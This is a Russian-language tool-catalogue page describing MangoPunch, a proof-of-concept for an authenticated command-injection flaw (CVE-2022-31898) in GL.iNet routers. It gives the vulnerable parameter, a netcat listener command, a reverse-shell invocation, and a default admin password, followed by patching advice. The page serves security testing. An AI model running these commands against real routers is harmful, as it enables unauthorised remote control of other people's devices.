Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
MangoPunch-CVE-2022-31898 — Инструмент для аутентифицированной инъекции команд (CVE-2022-31898) - HACKCONRD 2026. | Kitploit
Инструменты/GitHubGitHub/cryptoghost1/mangopunch-cve-2022-31898
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubcryptoghost1/mangopunch-cve-2022-31898

MangoPunch-CVE-2022-31898

Инструмент для аутентифицированной инъекции команд (CVE-2022-31898) - HACKCONRD 2026.

Репозиторий
56 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🥭 MangoPunch: CVE-2022-31898

Аутентифицированное внедрение команд ОС для устройств GL.iNet

Python CVE Security

 __  __                         _____                 _     
|  \/  |                       |  __ \               | |    
| \  / | __ _ _ __   __ _  ___ | |__) |   _ _ __   ___| |__  
| |\/| |/ _` | '_ \ / _` |/ _ \|  ___/ | | | '_ \ / __| '_ \ 
| |  | | (_| | | | | (_| | (_) | |   | |_| | | | | (__| | | |
|_|  |_|\__,_|_| |_|\__, |\___/|_|    \__,_|_| |_|\___|_| |_|
                     __/ |                                   
                    |___/                                    

🔍 Обзор уязвимости

Этот репозиторий содержит техническое подтверждение концепции (PoC) для уязвимости удаленного выполнения команд (RCE), обнаруженной в GL.iNet MT300N-V2 (Mango) и других моделях, работающих на версиях прошивки ниже 3.215.

Ошибка существует в параметре ping_addr диагностического API, позволяя аутентифицированному атакующему выполнять произвольные системные команды через метасимволы оболочки (;).


🚀 Руководство по эксплуатации

1. Подготовьте свой слушатель

Откройте терминал на вашей атакующей машине (Kali Linux) и запустите слушатель Netcat:

nc -lvnp 9292

2. Запустите эксплойт

Используйте следующую команду для запуска reverse shell:

python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>

🛠️ Параметры скрипта

ФлагПолное имяОписаниеПо умолчанию
-R--rhostIP удаленной цели (роутер)Обязательно
-P--rportПорт веб-управления443
-L--lhostIP слушателя (Kali/Атакующий)Обязательно
-l--lportПорт слушателяОбязательно
-p--pwdПароль администратораgoodlife
-t--httpsВключить HTTPSFalse

🛡️ Устранение уязвимости

  • Обновление прошивки: Убедитесь, что ваше устройство работает на версии 3.215 или выше.
  • Проверка ввода: Разработчики должны реализовать строгую проверку Regex для параметров IP/имени хоста и избегать функций, вызывающих оболочку, которые передают необработанные строки ОС.

Отказ от ответственности: Этот инструмент предназначен только для образовательных и авторизованных тестов безопасности. Автор не несет ответственности за любое неправомерное использование. MangoPunch: CVE-2022-31898

Скачать инструмент